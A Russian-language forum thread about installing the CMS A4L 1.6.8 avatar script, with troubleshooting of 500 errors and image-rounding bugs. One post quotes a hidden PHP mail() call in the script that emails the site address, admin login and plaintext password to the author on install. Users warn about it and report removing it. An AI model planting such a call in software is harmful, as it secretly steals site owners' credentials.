CMS A4L 1.6.8 (скрипт для создания аватарок)

Статус
В этой теме нельзя размещать новые ответы.
блин без .htaccess
не устанавливается

с .htaccess
выбивает 500 ошибку
помогите как это можно решить!!!!!!!!
 
Серано

у меня проблема с закруглением углов..
закругляет ток 1 угол..остальные углы вырезаны квадратиком :(

P.s. Нашел решение) 0у кого проблема с закруглением нужно отредактировать img.php
и перед


вставить


это примерно на 168 строке

Исправил серавно не закругляет помогите
 
  • Автор темы
  • Заблокирован
  • #14
ну так никто не знает что делать если выдает 500 ошибку???
 
В скрипте стучалка, причем довольно мерзкая. Нулем тут и не пахнет. Взяли скрипт как есть и тупо тут выложили.

Код:
mail("alter4life@yandex.ru","Сайт был установлен","Имя: $titla_\nСайт: $http_\nКод: $kod_rek_\nЛогин: $set_user_\nПасс: $set_pass_raw_\nПуть к скрипту: $put_script_\n");

При установке автор скрипта получает на почту и адрес сайта и логин пароль. Круто. Мне больше нечего добавить.
Делаю вывод, что это нихрена не нуль. Кто то тупо подписался под скриптом и все.

Ошибка с 500 нашла решение. ;) Чистим htaccess но не удаляем совсем с сервера.
Должна быть в нем всего одна строка и та пустая. Вот тогда должно воркать.

Тот кто смог поставить нормально. Поделитесь содержимым файла config.php у меня не инсталится (

UPD
Те кто установил скрипты, по возможности меняем пути и логин пароль.

Добавлено через 41 минуту
Под хайдом авторская версия. Ничего нулить там не надо. Автор давно выложил ее в паблик.
Как называется качай сколько влезет. Если б не стучалка, было бы вообще сказочно.


Стучалка убрана. Скачиваем.

 
да я почистилил htaccess
но теперь скрипт не устанавливается
 
Спасибо, что про стучалку сказали! Убрал ее, переустановил скрипт. :)
 
А какой смысл убирать стучалку в 1.6.8. если она бесплатная . Стучалка была внедрена , чтобы движок не распростроняли .

Тем более не всё так просто :)
 
А какой смысл убирать стучалку в 1.6.8. если она бесплатная . Стучалка была внедрена , чтобы движок не распростроняли .

Тем более не всё так просто :)

В первую очередь в целях собственной безопасности. Если он выложен, то к чему ограничения по распространению. Он и так уже распространяться будет. А безопасность и приватность своих данных превыше всего. ;)


Скрипт бесплатный, поэтому он и находится в этом разделе.
Руки оторвать затершему копирайты и написавшему какой он крутой нуллер. Мозгов нет, это уже не лечится ИМХО.

Ну а автору спасибо за старания над движком.
 
Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху